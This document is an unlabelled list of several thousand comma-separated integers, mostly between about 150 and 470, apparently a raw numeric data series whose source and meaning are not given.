350, 322, 279, 264, 273, 314, 266, 268, 270, 265, 259, 275, 332, 265, 275, 273, 267, 275, 244, 293, 292, 334, 391, 374, 279, 272, 270, 274, 320, 257, 206, 190, 194, 195, 227, 226, 219, 188, 225, 245, 235, 225, 257, 227, 223, 233, 338, 391, 358, 266, 238, 236, 253, 274, 270, 270, 350, 381, 368, 344, 328, 374, 278, 235, 238, 239, 235, 228, 214, 240, 230, 229, 218, 237, 225, 226, 233, 219, 185, 192, 207, 200, 190, 193, 196, 216, 200, 194, 202, 191, 199, 195, 192, 186, 194, 204, 187, 278, 439, 435, 450, 431, 420, 444, 449, 444, 435, 437, 449, 437, 430, 441, 445, 447, 421, 435, 451, 413, 325, 289, 286, 322, 381, 291, 307, 289, 298, 282, 278, 286, 342, 338, 330, 330, 302, 320, 329, 312, 316, 331, 319, 307, 322, 364, 358, 345, 336, 364, 372, 386, 355, 367, 363, 301, 277, 264, 254, 262, 253, 249, 279, 260, 253, 196, 206, 227, 204, 214, 191, 182, 205, 367, 349, 357, 345, 359, 358, 352, 362, 349, 355, 396, 403, 401, 401, 394, 385, 376, 404, 377, 394, 368, 352, 372, 401, 376, 404, 380, 359, 333, 378, 384, 377, 370, 333, 308, 319, 311, 304, 297, 315, 310, 315, 303, 302, 310, 319, 309, 332, 344, 343, 347, 326, 348, 325, 356, 326, 334, 317, 325, 306, 321, 316, 317, 270, 263, 260, 256, 263, 260, 251, 267, 256, 350, 448, 437, 437, 431, 450, 445, 382, 347, 355, 367, 340, 347, 341, 357, 342, 340, 336, 342, 338, 346, 329, 353, 340, 346, 347, 343, 328, 307, 323, 308, 425, 439, 450, 447, 442, 425, 425, 429, 361, 298, 279, 272, 284, 281, 276, 283, 285, 293, 296, 308, 339, 322, 331, 338, 346, 334, 315, 342, 324, 328, 316, 322, 315, 321, 344, 363, 359, 365, 330, 327, 319, 364, 353, 358, 368, 360, 348, 338, 325, 324, 320, 326, 303, 314, 307, 309, 319, 372, 391, 388, 326, 231, 245, 249, 267, 384, 238, 253, 235, 260, 277, 239, 230, 274, 336, 317, 325, 316, 327, 319, 320, 303, 318, 311, 303, 322, 315, 305, 310, 291, 307, 304, 297, 325, 303, 306, 307, 305, 291, 306, 331, 300, 310, 303, 306, 312, 292, 284, 319, 301, 316, 315, 277, 298, 299, 314, 304, 301, 306, 315, 319, 309, 305, 304, 308, 296, 298, 316, 308, 333, 302, 309, 303, 304, 314, 304, 311, 309, 315, 294, 318, 323, 307, 319, 308, 305, 305, 319, 341, 320, 326, 336, 341, 364, 374, 361, 354, 350, 343, 311, 247, 256, 259, 252, 244, 265, 251, 307, 413, 413, 416, 413, 425, 415, 403, 413, 425, 423, 412, 396, 409, 415, 404, 342, 323, 339, 333, 343, 329, 334, 329, 361, 381, 367, 383, 320, 315, 294, 268, 263, 264, 252, 256, 250, 216, 201, 188, 180, 192, 180, 187, 189, 170, 184, 184, 188, 194, 187, 176, 203, 197, 206, 194, 204, 194, 187, 183, 195, 191, 204, 210, 265, 309, 316, 309, 320, 269, 330, 329, 328, 347, 394, 395, 397, 387, 385, 386, 390, 394, 387, 398, 345, 362, 359, 358, 372, 366, 364, 373, 375, 376, 344, 366, 319, 319, 296, 292, 289, 282, 233, 247, 259, 223, 214, 254, 261, 256, 246, 255, 257, 265, 250, 289, 419, 417, 430, 387, 387, 441, 408, 403, 406, 382, 317, 265, 269, 275, 254, 247, 254, 268, 251, 262, 269, 365, 375, 382, 374, 384, 388, 369, 392, 370, 368, 354, 310, 256, 239, 245, 243, 241, 227, 228, 226, 227, 221, 241, 229, 324, 366, 354, 367, 377, 413, 414, 422, 420, 412, 402, 422, 407, 423, 399, 411, 413, 401, 423, 406, 395, 414, 414, 393, 400, 410, 395, 365, 341, 329, 356, 360, 330, 340, 345, 340, 305, 289, 263, 274, 259, 268, 261, 294, 287, 292, 293, 339, 391, 390, 372, 369, 356, 367, 390, 361, 246, 252, 262, 238, 251, 246, 234, 237, 227, 227, 209, 219, 217, 219, 228, 225, 231, 242, 232, 228, 220, 234, 360, 386, 229, 233, 247, 237, 221, 244, 219, 231, 230, 308, 389, 320, 299, 420, 384, 402, 400, 394, 398, 407, 363, 337, 285, 293, 293, 284, 276, 277, 291, 303, 285, 283, 292, 269, 279, 292, 310, 302, 306, 319, 314, 317, 313, 301, 323, 316, 315, 317, 423, 432, 428, 442, 424, 428, 437, 375, 365, 367, 359, 370, 356, 373, 364, 359, 343, 333, 363, 353, 373, 360, 344, 357, 360, 349, 358, 351, 365, 346, 353, 331, 339, 332, 286, 303, 317, 291, 290, 262, 218, 228, 233, 235, 242, 254, 248, 229, 241, 228, 238, 230, 235, 238, 242, 235, 235, 242, 317, 430, 415, 399, 412, 441, 423, 421, 432, 424, 317, 306, 314, 328, 447, 430, 411, 417, 422, 429, 409, 394, 362, 383, 367, 360, 357, 366, 369, 367, 364, 378, 354, 357, 367, 378, 358, 353, 376, 376, 357, 363, 369, 370, 371, 378, 380, 364, 350, 359, 343, 346, 341, 350, 354, 343, 347, 369, 373, 330, 318, 297, 305, 311, 353, 275, 253, 268, 271, 181, 176, 160, 168, 189, 175, 197, 333, 334, 338, 323, 330, 331, 341, 343, 340, 337, 336, 319, 323, 317, 336, 332, 324, 324, 310, 326, 314, 297, 300, 337, 361, 380, 364, 405, 397, 392, 390, 402, 402, 399, 394, 391, 368, 352, 354, 356, 352, 365, 357, 355, 353, 352, 348, 351, 346, 364, 340, 301, 308, 302, 294, 293, 265, 248, 232, 251, 236, 236, 224, 231, 248, 231, 227, 198, 211, 188, 197, 200, 196, 202, 278, 259, 275, 305, 365, 349, 356, 342, 351, 352, 371, 356, 359, 356, 349, 343, 306, 273, 263, 258, 267, 264, 263, 263, 250, 266, 251, 271, 258, 262, 268, 257, 257, 267, 258, 251, 260, 259, 277, 273, 259, 259, 262, 254, 245, 251, 242, 269, 340, 336, 344, 357, 384, 362, 373, 407, 391, 394, 385, 389, 367, 362, 354, 360, 323, 315, 275, 316, 298, 269, 262, 278, 280, 259, 259, 269, 278, 279, 261, 269, 259, 259, 255, 251, 257, 248, 229, 232, 220, 236, 229, 205, 241, 216, 210, 198, 269, 301, 292, 286, 294, 283, 284, 296, 301, 307, 287, 357, 380, 377, 383, 376, 385, 377, 338, 302, 306, 302, 301, 301, 305, 295, 297, 303, 304, 300, 298, 289, 304, 283, 296, 287, 299, 278, 256, 262, 260, 244, 251, 223, 269, 251, 237, 260, 246, 238, 240, 236, 229, 246, 227, 235, 238, 221, 232, 243, 228, 229, 230, 234, 229, 209, 218, 186, 245, 221, 218, 197, 227, 212, 225, 219, 222, 213, 235, 226, 230, 239, 230, 253, 243, 273, 227, 215, 243, 212, 233, 231, 240, 235, 225, 235, 219, 251, 231, 223, 251, 271, 282, 271, 269, 267, 243, 247, 250, 272, 252, 235, 246, 242, 250, 247, 234, 216, 206, 209, 209, 202, 228, 218, 210, 233, 211, 213, 213, 208, 225, 215, 218, 200, 229, 212, 203, 218, 196, 192, 211, 207, 221, 235, 209, 212, 230, 190, 183, 181, 175, 181, 174, 174, 188, 182, 200, 179, 188, 199, 215, 214, 376, 384, 412, 386, 369, 389, 389, 393, 395, 389, 364, 396, 356, 314, 316, 324, 308, 322, 306, 320, 308, 308, 303, 310, 302, 303, 321, 293, 301, 296, 287, 290, 286, 285, 283, 284, 282, 277, 271, 287, 281, 298, 266, 290, 283, 244, 217, 223, 218, 225, 206, 204, 215, 214, 212, 237, 227, 229, 221, 219, 217, 221, 206, 223, 207, 209, 191, 205, 212, 206, 207, 279, 393, 408, 395, 412, 382, 376, 289, 310, 314, 301, 277, 286, 287, 300, 279, 278, 272, 286, 227, 209, 196, 237, 224, 245, 233, 235, 246, 233, 214, 206, 235, 211, 212, 215, 226, 216, 208, 220, 210, 225, 223, 212, 200, 219, 217, 217, 192, 220, 240, 214, 231, 208, 170, 226, 235, 213, 208, 216, 222, 217, 214, 223, 365, 402, 319, 415, 403, 401, 381, 382, 389, 375, 388, 377, 371, 381, 284, 293, 299, 255, 292, 262, 243, 230, 225, 219, 250, 252, 278, 246, 223, 246, 240, 253, 239, 258, 264, 242, 264, 273, 271, 242, 269, 273, 284, 260, 265, 261, 274, 262, 276, 265, 274, 276, 274, 270, 295, 240, 249, 240, 256, 255, 250, 248, 236, 251, 269, 244, 234, 251, 259, 254, 249, 239, 249, 236, 250, 239, 239, 247, 249, 249, 243, 242, 200, 201, 197, 192, 208, 194, 199, 197, 200, 214, 208, 210, 216, 213, 211, 217, 208, 224, 213, 214, 223, 214, 259, 382, 336, 363, 350, 378, 365, 372, 362, 331, 311, 317, 295, 303, 268, 286, 282, 289, 266, 277, 287, 299, 291, 282, 271, 281, 254, 292, 310, 281, 262, 269, 267, 272, 283, 283, 281, 282, 296, 355, 336, 360, 370, 351, 350, 359, 345, 352, 334, 359, 327, 330, 336, 307, 287, 273, 260, 282, 277, 288, 274, 277, 286, 292, 281, 271, 286, 284, 272, 287, 278, 291, 281, 294, 279, 277, 297, 289, 281, 297, 302, 376, 373, 379, 365, 339, 285, 335, 324, 413, 364, 322, 318, 274, 288, 281, 272, 258, 245, 222, 201, 208, 204, 196, 188, 205, 195, 235, 271, 249, 252, 264, 350, 339, 329, 350, 315, 301, 285, 305, 276, 275, 272, 291, 234, 244, 255, 232, 243, 261, 234, 259, 246, 236, 237, 243, 238, 246, 244, 235, 257, 247, 241, 237, 234, 203, 215, 208, 208, 191, 200, 216, 205, 201, 220, 188, 196, 205, 220, 214, 212, 207, 209, 220, 212, 231, 268, 276, 319, 324, 346, 354, 319, 334, 350, 334, 320, 327, 341, 348, 342, 340, 340, 331, 330, 321, 312, 290, 299, 299, 303, 291, 300, 300, 304, 302, 299, 295, 304, 298, 304, 302, 299, 304, 337, 335, 345, 331, 335, 345, 338, 324, 347, 337, 328, 354, 326, 341, 331, 337, 345, 379, 357, 349, 352, 352, 345, 283, 268, 279, 284, 225, 244, 239, 231, 235, 230, 270, 238, 244, 201, 228, 233, 214, 215, 218, 209, 197, 206, 192, 202, 200, 199, 192, 207, 202, 206, 204, 192, 190, 201, 195, 171, 189, 190, 199, 199, 179, 200, 177, 185, 195, 210, 199, 203, 192, 180, 187, 180, 201, 203, 204, 205, 189, 177, 262, 369, 375, 368, 375, 376, 362, 319, 322, 295, 298, 304, 305, 308, 294, 305, 334, 375, 374, 349, 361, 365, 376, 355, 365, 368, 345, 315, 317, 327, 316, 339, 320, 337, 307, 325, 269, 284, 269, 254, 263, 296, 433, 391, 402, 399, 407, 394, 384, 389, 388, 429, 377, 276, 280, 280, 269, 344, 278, 257, 276, 249, 281, 264, 272, 283, 262, 249, 268, 364, 429, 457, 435, 420, 422, 439, 444, 444, 362, 287, 270, 283, 287, 291, 280, 280, 295, 281, 279, 282, 298, 281, 293, 270, 279, 292, 340, 343, 336, 321, 345, 350, 349, 344, 339, 331, 358, 341, 327, 300, 320, 311, 324, 331, 322, 317, 332, 324, 285, 276, 298, 279, 271, 308, 368, 391, 428, 413, 412, 418, 420, 401, 427, 434, 423, 403, 374, 356, 367, 357, 357, 367, 345, 330, 324, 320, 241, 246, 236, 234, 228, 237, 229, 240, 217, 217, 281, 358, 331, 339, 335, 337, 359, 400, 413, 407, 401, 408, 393, 396, 407, 409, 407, 396, 413, 391, 409, 397, 364, 361, 345, 344, 344, 351, 361, 354, 340, 360, 363, 339, 346, 349, 358, 339, 350, 354, 344, 378, 362, 366, 367, 362, 369, 360, 369, 365, 356, 329, 293, 275, 262, 277, 271, 262, 271, 276, 262, 263, 269, 274, 269, 265, 281, 298, 305, 289, 295, 283, 289, 288, 304, 309, 297, 364, 349, 345, 340, 340, 350, 319, 328, 303, 310, 306, 300, 313, 333, 361, 381, 364, 364, 336, 335, 342, 332, 330, 327, 320, 312, 406, 457, 459, 434, 436, 434, 445, 397, 443, 431, 443, 437, 432, 423, 428, 454, 432, 430, 429, 432, 437, 424, 385, 328, 323, 332, 323, 333, 327, 329, 313, 341, 323, 317, 326, 379, 403, 360, 337, 337, 357, 329, 321, 320, 314, 326, 335, 344, 335, 354, 332, 347, 329, 336, 344, 345, 339, 380, 414, 396, 415, 410, 419, 400, 423, 389, 356, 373, 367, 388, 284, 295, 297, 299, 295, 319, 368, 281, 223, 254, 225, 269, 291, 267, 285, 288, 291, 292, 318, 404, 391, 368, 376, 373, 357, 353, 362, 361, 368, 377, 379, 286, 279, 268, 331, 395, 381, 373, 369, 375, 366, 378, 385, 375, 358, 362, 385, 380, 386, 357, 366, 372, 385, 369, 387, 385, 376, 394, 380, 381, 386, 396, 344, 306, 297, 305, 297, 276, 280, 228, 221, 220, 242, 240, 269, 262, 243, 241, 250, 247, 240, 237, 251, 239, 242, 236, 276, 321, 329, 381, 378, 358, 369, 372, 351, 350, 275, 251, 246, 242, 273, 249, 253, 194, 195, 197, 182, 207, 197, 195, 195, 213, 224, 216, 217, 213, 350, 424, 408, 397, 346, 339, 310, 321, 326, 314, 316, 299, 319, 316, 296, 305, 300, 313, 308, 291, 297, 284, 373, 425, 438, 405, 418, 393, 401, 388, 303, 319, 321, 317, 326, 332, 309, 324, 314, 362, 414, 318, 323, 425, 333, 315, 306, 321, 314, 310, 320, 318, 323, 432, 437, 407, 416, 416, 415, 416, 325, 332, 343, 318, 343, 312, 328, 320, 331, 329, 329, 307, 298, 297, 307, 318, 324, 324, 323, 328, 317, 333, 316, 299, 310, 410, 411, 404, 407, 418, 330, 339, 325, 323, 304, 320, 305, 312, 394, 422, 415, 427, 414, 417, 421, 417, 420, 384, 323, 366, 382, 356, 375, 371, 343, 312, 299, 300, 296, 299, 303, 298, 302, 297, 292, 307, 294, 300, 349, 350, 332, 328, 335, 338, 335, 342, 342, 350, 337, 330, 313, 297, 307, 309, 294, 322, 305, 333, 421, 401, 418, 402, 414, 417, 377, 319, 317, 335, 328, 309, 330, 322, 331, 326, 345, 303, 364, 432, 407, 438, 424, 386, 412, 357, 314, 327, 322, 319, 302, 333, 317, 316, 324, 420, 423, 427, 404, 417, 392, 391, 386, 322, 309, 308, 319, 332, 334, 313, 319, 337, 333, 309, 308, 311, 306, 321, 326, 316, 447, 443, 410, 408, 430, 431, 398, 414, 418, 406, 417, 414, 341, 322, 352, 377, 387, 382, 374, 360, 324, 321, 331, 319, 337, 306, 313, 377, 370, 364, 360, 360, 375, 366, 369, 340, 313, 324, 328, 268, 279, 273, 271, 382, 425, 433, 418, 433, 417, 416, 409, 339, 337, 318, 338, 321, 326, 315, 350, 383, 383, 368, 371, 363, 356, 296, 274, 264, 271, 249, 262, 244, 283, 267, 326, 411, 414, 417, 380, 346, 330, 317, 337, 332, 311, 328, 305, 319, 311, 313, 308, 317, 296, 310, 310, 308, 377, 449, 452, 448, 445, 447, 438, 426, 433, 427, 425, 418, 390, 365, 371, 353, 371, 359, 374, 360, 357, 372, 363, 316, 292, 284, 285, 289, 298, 282, 269, 209, 231, 253, 236, 251, 250, 248, 236, 235, 246, 255, 244, 254, 258, 261, 263, 249, 246, 247, 256, 238, 248, 313, 353, 360, 356, 320, 355, 353, 360, 370, 341, 353, 346, 356, 333, 331, 335, 337, 339, 335, 335, 337, 315, 293, 279, 281, 284, 265, 282, 284, 293, 269, 268, 277, 278, 284, 271, 287, 270, 269, 297, 278, 297, 299, 295, 268, 274, 296, 336, 339, 335, 353, 308, 329, 320, 343, 339, 329, 349, 333, 338, 357, 372, 352, 372, 262, 229, 222, 200, 222, 206, 192, 194, 228, 331, 327, 321, 325, 344, 327, 331, 332, 373, 369, 381, 395, 389, 382, 390, 378, 387, 304, 276, 271, 279, 353, 381, 362, 361, 342, 351, 371, 359, 370, 361, 369, 358, 305, 246, 253, 243, 238, 237, 239, 235, 231, 222, 229, 224, 215, 206, 242, 231, 222, 215, 226, 210, 230, 220, 272, 373, 390, 401, 398, 398, 406, 388, 373, 350, 308, 321, 326, 319, 318, 317, 328, 327, 319, 314, 312, 331, 311, 282, 243, 266, 235, 248, 248, 241, 249, 261, 345, 415, 392, 379, 398, 389, 395, 403, 386, 392, 393, 394, 397, 381, 383, 385, 403, 394, 396, 382, 377, 379, 377, 388, 383, 382, 335, 351, 341, 338, 344, 358, 359, 352, 356, 361, 343, 353, 359, 351, 344, 345, 344, 358, 350, 357, 369, 357, 350, 343, 312, 319, 297, 299, 257, 238, 231, 212, 238, 221, 219, 239, 270, 245, 253, 269, 244, 276, 267, 273, 246, 263, 256, 260, 251, 261, 257, 256, 343, 375, 380, 368, 363, 379, 351, 354, 374, 367, 357, 378, 368, 367, 371, 365, 371, 340, 390, 267, 256, 278, 232, 259, 237, 238, 242, 250, 229, 241, 248, 245, 217, 252, 234, 245, 226, 241, 228, 259, 236, 257, 275, 285, 383, 367, 363, 349, 357, 369, 351, 285, 258, 250, 265, 247, 235, 222, 207, 197, 200, 283, 400, 370, 403, 386, 366, 390, 361, 378, 400, 288, 309, 302, 284, 309, 296, 299, 336, 308, 293, 295, 295, 292, 303, 303, 288, 309, 302, 338, 320, 367, 380, 362, 375, 377, 365, 348, 388, 370, 362, 357, 374, 322, 280, 271, 283, 281, 289, 256, 270, 252, 280, 271, 269, 263, 262, 254, 234, 247, 291, 303, 319, 365, 382, 373, 390, 369, 359, 347, 369, 291, 290, 296, 290, 291, 307, 296, 306, 314, 313, 302, 296, 310, 370, 435, 430, 424, 430, 413, 360, 370, 385, 375, 357, 329, 313, 303, 267, 264, 268, 274, 273, 263, 271, 264, 255, 289, 250, 245, 231, 228, 215, 195, 223, 239, 246, 258, 253, 249, 248, 250, 259, 253, 250, 315, 308, 320, 327, 293, 304, 321, 376, 275, 339, 387, 368, 375, 327, 310, 302, 306, 307, 316, 318, 306, 313, 308, 318, 324, 325, 380, 357, 349, 360, 364, 259, 251, 250, 252, 246, 239, 249, 236, 246, 239, 201, 226, 234, 244, 242, 245, 238, 248, 246, 238, 233, 294, 423, 444, 413, 402, 410, 398, 403, 425, 411, 409, 386, 418, 396, 421, 369, 281, 266, 282, 283, 278, 259, 237, 250, 249, 263, 263, 264, 273, 266, 261, 278, 266, 287, 261, 270, 282, 264, 256, 268, 257, 255, 269, 379, 359, 375, 384, 365, 345, 274, 231, 275, 280, 285, 279, 266, 281, 280, 262, 288, 281, 266, 263, 283, 266, 324, 370, 380, 371, 379, 372, 376, 377, 361, 377, 371, 369, 357, 366, 362, 361, 362, 347, 367, 364, 369, 338, 331, 356, 343, 356, 331, 336, 328, 327, 307, 325, 322, 313, 313, 324, 326, 296, 358, 369, 368, 376, 376, 384, 385, 382, 368, 345, 348, 366, 374, 369, 365, 361, 362, 379, 372, 383, 361, 372, 362, 371, 367, 364, 384, 379, 380, 368, 383, 388, 372, 377, 359, 367, 307, 324, 296, 276, 294, 288, 307, 302, 292, 309, 264, 260, 187, 232, 251, 237, 209, 213, 211, 207, 202, 208, 198, 205, 212, 198, 206, 204, 230, 212, 226, 226, 235, 228, 224, 209, 216, 236, 200, 210, 202, 205, 220, 214, 201, 227, 243, 281, 281, 257, 267, 340, 337, 347, 335, 357, 341, 322, 327, 310, 321, 324, 295, 271, 288, 290, 286, 254, 255, 259, 239, 238, 229, 219, 227, 224, 234, 192, 199, 186, 221, 206, 201, 216, 225, 220, 200, 208, 228, 211, 200, 211, 205, 196, 185, 202, 223, 187, 199, 204, 196, 201, 198, 326, 390, 415, 393, 400, 400, 393, 391, 393, 354, 374, 352, 372, 364, 369, 371, 372, 354, 354, 315, 250, 296, 442, 426, 440, 452, 439, 435, 399, 371, 366, 381, 353, 363, 347, 347, 353, 361, 365, 336, 347, 358, 344, 357, 270, 284, 267, 270, 254, 255, 258, 253, 261, 281, 262, 251, 264, 273, 275, 271, 259, 244, 264, 263, 272, 264, 271, 249, 247, 252, 240, 247, 241, 242, 291, 291, 292, 291, 293, 287, 356, 402, 401, 413, 381, 405, 403, 402, 399, 413, 401, 390, 362, 358, 365, 336, 324, 365, 361, 352, 363, 331, 356, 343, 344, 343, 336, 342, 346, 348, 343, 310, 273, 273, 269, 271, 332, 321, 468, 387, 382, 295, 265, 268, 256, 256, 259, 248, 271, 344, 399, 373, 356, 372, 375, 377, 382, 365, 371, 368, 352, 381, 347, 297, 298, 285, 286, 294, 282, 280, 276, 269, 280, 274, 270, 278, 353, 338, 339, 336, 376, 377, 396, 391, 387, 390, 401, 405, 384, 375, 374, 394, 387, 391, 387, 380, 381, 384, 376, 368, 334, 321, 330, 342, 313, 329, 315, 323, 322, 328, 317, 308, 308, 333, 312, 314, 325, 370, 390, 368, 384, 405, 371, 362, 310, 300, 287, 282, 279, 271, 284, 288, 234, 187, 204, 201, 204, 211, 224, 234, 215, 240, 224, 212, 215, 231, 237, 238, 232, 226, 220, 224, 234, 218, 223, 226, 223, 233, 237, 231, 230, 223, 221, 224, 232, 229, 226, 226, 218, 235, 232, 224, 211, 219, 210, 211, 220, 221, 232, 231, 237, 261, 249, 260, 246, 242, 250, 265, 248, 236, 204, 221, 203, 207, 200, 200, 204, 199, 192, 203, 182, 222, 219, 230, 249, 427, 416, 445, 423, 423, 417, 427, 435, 448, 403, 296, 233, 423, 422, 415, 392, 408, 380, 386, 387, 391, 421, 405, 400, 283, 259, 247, 262, 267, 265, 272, 286, 379, 388, 364, 378, 371, 388, 333, 302, 301, 284, 233, 238, 251, 238, 240, 226, 237, 226, 236, 208, 208, 252, 227, 240, 259, 234, 230, 229, 244, 225, 251, 232, 273, 265, 280, 288, 268, 272, 318, 330, 345, 331, 337, 319, 334, 351, 419, 416, 414, 395, 422, 410, 416, 413, 362, 331, 329, 310, 306, 346, 322, 307, 340, 329, 373, 428, 435, 433, 438, 408, 415, 429, 424, 406, 425, 423, 413, 424, 399, 420, 426, 431, 414, 397, 362, 353, 357, 354, 362, 345, 357, 353, 363, 347, 352, 354, 350, 353, 393, 340, 358, 355, 358, 371, 368, 388, 386, 376, 394, 371, 367, 364, 379, 362, 346, 367, 363, 377, 367, 357, 358, 368, 351, 380, 371, 380, 390, 326, 315, 312, 293, 298, 303, 291, 320, 296, 294, 259, 247, 248, 248, 260, 273, 245, 250, 254, 235, 245, 234, 238, 229, 246, 254, 240, 252, 236, 239, 246, 221, 246, 245, 238, 235, 249, 241, 245, 242, 234, 264, 266, 265, 265, 264, 266, 257, 252, 256, 246, 276, 275, 273, 270, 304, 375, 371, 356, 349, 347, 346, 321, 330, 324, 332, 319, 324, 378, 404, 396, 398, 411, 396, 417, 376, 331, 321, 331, 300, 302, 298, 311, 328, 291, 313, 298, 294, 312, 327, 299, 295, 297, 244, 239, 256, 223, 234, 223, 235, 229, 225, 214, 226, 186, 198, 193, 199, 196, 222, 219, 228, 236, 238, 239, 219, 200, 212, 216, 215, 200, 205, 203, 231, 225, 208, 257, 277, 265, 267, 265, 281, 258, 266, 275, 272, 271, 280, 276, 270, 284, 279, 355, 387, 371, 365, 297, 284, 244, 266, 264, 260, 265, 263, 264, 258, 254, 249, 257, 262, 240, 225, 221, 213, 211, 217, 216, 218, 229, 236, 216, 208, 216, 215, 228, 229, 277, 255, 244, 237, 230, 262, 238, 240, 257, 243, 228, 250, 253, 250, 254, 233, 236, 246, 249, 254, 227, 235, 228, 236, 228, 238, 213, 247, 229, 217, 216, 229, 241, 236, 225, 245, 225, 217, 233, 235, 244, 285, 281, 305, 368, 368, 365, 368, 366, 369, 357, 330, 328, 308, 306, 320, 321, 424, 433, 421, 440, 418, 422, 375, 374, 343, 359, 350, 338, 348, 353, 341, 319, 326, 330, 317, 302, 350, 414, 415, 398, 423, 385, 382, 380, 375, 376, 318, 299, 289, 284, 271, 288, 288, 275, 255, 244, 240, 272, 235, 261, 244, 246, 236, 222, 237, 192, 156, 158, 175, 161, 159, 170, 157, 159, 173, 161, 146, 180, 159, 154, 196, 229, 248, 204, 221, 243, 210, 215, 193, 220, 210, 393, 444, 449, 443, 432, 438, 397, 376, 374, 381, 365, 369, 376, 353, 385, 367, 365, 377, 377, 371, 319, 293, 306, 294, 302, 297, 314, 293, 269, 285, 285, 250, 246, 230, 250, 250, 250, 242, 243, 233, 222, 267, 246, 236, 247, 266, 260, 256, 257, 249, 246, 227, 236, 230, 233, 222, 212, 215, 213, 218, 206, 218, 222, 223, 194, 204, 202, 219, 204, 228, 214, 234, 230, 223, 220, 229, 215, 227, 215, 211, 224, 223, 209, 181, 216, 234, 225, 208, 214, 204, 219, 214, 212, 224, 257, 260, 249, 254, 257, 269, 270, 262, 329, 330, 350, 331, 338, 340, 349, 332, 346, 353, 349, 350, 349, 367, 322, 320, 314, 301, 272, 262, 255, 222, 226, 236, 205, 204, 189, 208, 241, 238, 237, 244, 238, 236, 232, 248, 241, 249, 257, 320, 303, 312, 306, 311, 299, 360, 365, 373, 356, 353, 345, 350, 361, 333, 331, 352, 327, 314, 296, 295, 312, 308, 284, 296, 299, 343, 377, 371, 353, 378, 373, 382, 379, 363, 362, 368, 352, 359, 352, 341, 360, 345, 359, 357, 338, 337, 348, 348, 369, 349, 347, 383, 355, 333, 356, 353, 371, 338, 339, 354, 344, 349, 352, 333, 351, 348, 351, 327, 270, 284, 251, 234, 260, 258, 281, 257, 172, 172, 213, 198, 202, 217, 217, 215, 224, 248, 242, 225, 236, 260, 353, 311, 290, 309, 297, 295, 350, 406, 416, 376, 391, 348, 371, 372, 335, 307, 278, 228, 226, 246, 236, 240, 229, 242, 359, 416, 415, 396, 395, 402, 357, 273, 256, 249, 246, 331, 374, 364, 372, 332, 371, 361, 362, 372, 385, 352, 367, 373, 300, 292, 266, 285, 306, 297, 273, 291, 259, 247, 252, 279, 272, 281, 315, 311, 323, 336, 352, 368, 361, 390, 369, 372, 349, 281, 294, 280, 276, 292, 313, 253, 253, 245, 231, 189, 203, 196, 189, 207, 188, 207, 244, 268, 259, 257, 307, 315, 325, 332, 316, 283, 317, 306, 307, 311, 319, 327, 326, 365, 425, 429, 441, 401, 422, 419, 416, 421, 403, 427, 412, 419, 423, 425, 425, 374, 361, 366, 358, 340, 342, 332, 255, 223, 223, 237, 235, 207, 219, 208, 199, 211, 212, 230, 205, 301, 364, 359, 352, 349, 281, 272, 253, 258, 294, 249, 263, 254, 262, 275, 232, 260, 255, 260, 281, 250, 245, 256, 262, 287, 280, 256, 245, 302, 315, 256, 250, 261, 261, 253, 269, 264, 257, 265, 254, 270, 345, 330, 332, 342, 342, 337, 337, 334, 329, 338, 319, 320, 323, 331, 327, 334, 299, 281, 292, 310, 296, 298, 302, 330, 315, 308, 306, 305, 309, 302, 328, 316, 307, 301, 372, 439, 439, 410, 392, 331, 339, 339, 312, 329, 286, 322, 309, 317, 315, 308, 335, 315, 300, 370, 370, 392, 389, 374, 368, 377, 380, 371, 391, 378, 370, 376, 367, 353, 377, 376, 375, 366, 370, 367, 364, 356, 363, 354, 361, 365, 356, 331, 293, 294, 294, 299, 303, 288, 297, 294, 300, 293, 298, 302, 296, 297, 293, 287, 310, 271, 300, 289, 297, 279, 313, 327, 355, 366, 355, 351, 317, 303, 309, 328, 354, 363, 355, 376, 353, 351, 354, 360, 348, 355, 360, 352, 338, 363, 345, 358, 340, 358, 344, 349, 355, 349, 348, 348, 341, 355, 343, 350, 350, 343, 347, 360, 365, 366, 339, 346, 359, 355, 295, 299, 307, 285, 287, 303, 290, 295, 301, 278, 277, 250, 262, 266, 300, 271, 274, 222, 246, 245, 231, 232, 210, 216, 238, 257, 253, 252, 255, 256, 282, 272, 245, 305, 318, 324, 325, 352, 385, 398, 369, 374, 387, 382, 383, 363, 372, 355, 351, 360, 359, 358, 299, 298, 298, 308, 314, 302, 320, 312, 311, 305, 300, 286, 312, 294, 304, 306, 296, 295, 310, 290, 294, 285, 291, 285, 304, 285, 284, 287, 303, 323, 340, 331, 326, 323, 319, 319, 313, 323, 320, 309, 324, 316, 317, 328, 329, 326, 343, 397, 380, 376, 368, 388, 379, 391, 401, 398, 377, 399, 378, 384, 370, 401, 409, 384, 408, 357, 382, 370, 380, 374, 374, 323, 314, 337, 318, 335, 348, 380, 386, 379, 375, 370, 323, 303, 290, 305, 314, 346, 339, 342, 322, 324, 324, 338, 353, 389, 371, 373, 379, 362, 370, 357, 314, 323, 321, 332, 377, 384, 392, 381, 391, 378, 382, 385, 363, 356, 366, 359, 364, 376, 355, 359, 361, 358, 349, 365, 344, 344, 364, 331, 340, 341, 313, 269, 279, 254, 197, 196, 196, 219, 216, 214, 212, 190, 193, 204, 199, 210, 194, 211, 201, 190, 197, 196, 203, 180, 209, 210, 190, 193, 191, 192, 225, 259, 256, 277, 360, 368, 364, 347, 335, 334, 345, 341, 346, 339, 340, 307, 318, 321, 322, 327, 318, 315, 456, 457, 443, 450, 467, 428, 435, 458, 429, 438, 362, 366, 370, 369, 370, 365, 363, 363, 353, 358, 359, 359, 372, 364, 380, 376, 361, 375, 347, 419, 326, 345, 334, 351, 351, 359, 354, 358, 353, 336, 347, 358, 363, 354, 344, 353, 346, 356, 327, 326, 357, 354, 332, 359, 347, 347, 334, 325, 326, 325, 319, 307, 321, 322, 369, 352, 349, 354, 364, 345, 337, 348, 342, 355, 358, 343, 332, 329, 321, 305, 311, 294, 310, 310, 318, 305, 345, 356, 350, 344, 347, 342, 327, 344, 333, 326, 323, 324, 354, 382, 390, 380, 395, 394, 384, 400, 376, 370, 376, 374, 307, 318, 308, 303, 318, 331, 326, 364, 370, 376, 351, 364, 366, 348, 342, 338, 321, 308, 436, 427, 427, 410, 426, 410, 430, 432, 424, 417, 419, 423, 432, 431, 426, 423, 419, 387, 360, 359, 343, 362, 345, 352, 363, 358, 357, 351, 358, 353, 361, 375, 386, 362, 367, 381, 341, 325, 345, 318, 337, 335, 337, 334, 342, 339, 331, 331, 329, 345, 310, 272, 277, 284, 263, 289, 251, 266, 264, 256, 324, 393, 388, 384, 371, 364, 293, 279, 282, 277, 294, 285, 276, 275, 290, 286, 302, 333, 